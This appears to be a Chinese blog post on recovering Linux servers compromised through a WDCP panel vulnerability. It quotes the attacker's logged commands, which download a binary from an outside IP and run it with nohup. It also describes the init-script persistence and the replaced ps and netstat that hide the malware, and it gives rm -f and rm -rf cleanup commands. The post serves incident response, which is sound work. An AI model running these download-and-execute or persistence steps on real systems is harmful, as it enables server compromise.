黑客利用wdcp漏洞入侵。
从日志来看,入侵是由工具自动化完成的。
黑 客入侵后留下的命令记录如下:
cd /root
wget http://60.172.229.178/3.rar
chmod 0755 /root/3.rar
chmod 0755 ./3.rar
/dev/null 2>&1 &
nohup ./3.rar > /dev/null 2>&1 &
(3.rar MD5为:522a3b05908c40e37c08e8fb14171dfc)
下面主要写一下3.rar(注意这是个二进制程序,而非压缩包)执行后修改过的文件,给大家修复提供参考。
创建文件:
/etc/rc.d/init.d/DbSecuritySdt
/etc/rc.d/rc1.d/S97DbSecuritySdt
/etc/rc.d/rc2.d/S97DbSecuritySdt
/etc/rc.d/rc3.d/S97DbSecuritySdt
/etc/rc.d/rc4.d/S97DbSecuritySdt
/etc/rc.d/rc5.d/S97DbSecuritySdt
上面的文件内容都一样,内容为:
#!/bin/bash
/root/3.rar
目的是让3.rar重启后自动运行。
创建文件:
/usr/bin/bsd-port/getty
文件内容和3.rar相同。
同目录下还有conf.n和getty.lock。
创建文件:
/usr/bin/acpid
文件内容和3.rar相同。
创建文件:
/etc/rc.d/init.d/selinux
/etc/rc.d/rc1.d/S99selinux
/etc/rc.d/rc2.d/S99selinux
/etc/rc.d/rc3.d/S99selinux
/etc/rc.d/rc4.d/S99selinux
/etc/rc.d/rc5.d/S99selinux
文件内容如下:
#!/bin/bash
/usr/bin/bsd-port/getty
目的还是让恶意程序在系统重启后自动行动。
创建目录:
/usr/bin/dpkgd/
目录下有二个程序:
netstat ps
这个是系统中正常的程序,转移到这里做了备份。
替换掉了系统中的/bin/ps和/bin/netstat。
替换后的程序在执行后可以隐藏掉恶意程序的相关执行信息,并且加入了复活恶意程序的功能。
文件操作到此结束。
如果确定和本文描述的入侵情况完全相同,可以用下面的命令修复:
killall 3.rar getty acpid
rm -f /etc/rc.d/rc*.d/S97DbSecuritySdt
rm -f /etc/rc.d/init.d/DbSecuritySdt
rm -rf /usr/bin/bsd-port/
rm -f /usr/bin/acpid
rm -f /etc/init.d/selinux
rm -f /etc/rc.d/rc*.d/S99selinux
rm -f /bin/ps /bin/netstat
cp /usr/bin/dpkgd/ps /bin/
cp /usr/bin/dpkgd/netstat /bin/
这次的WDCP漏洞中,这个3.rar做的恶比较多,但它并不是唯一的做恶者(其他的人或者程序会留下其他的东西,不在上面的描述范围内)。
最早的入侵痕迹在10月初已经出现,3.rar出现的比较晚,但是出现的多,而且表面上造成的影响比较大(对外扫描肯定会导致机器被封,在国外某些主机商甚至会BAN帐号)。
转载请注明:小康的个人主页~ » WDCP漏洞入侵后处理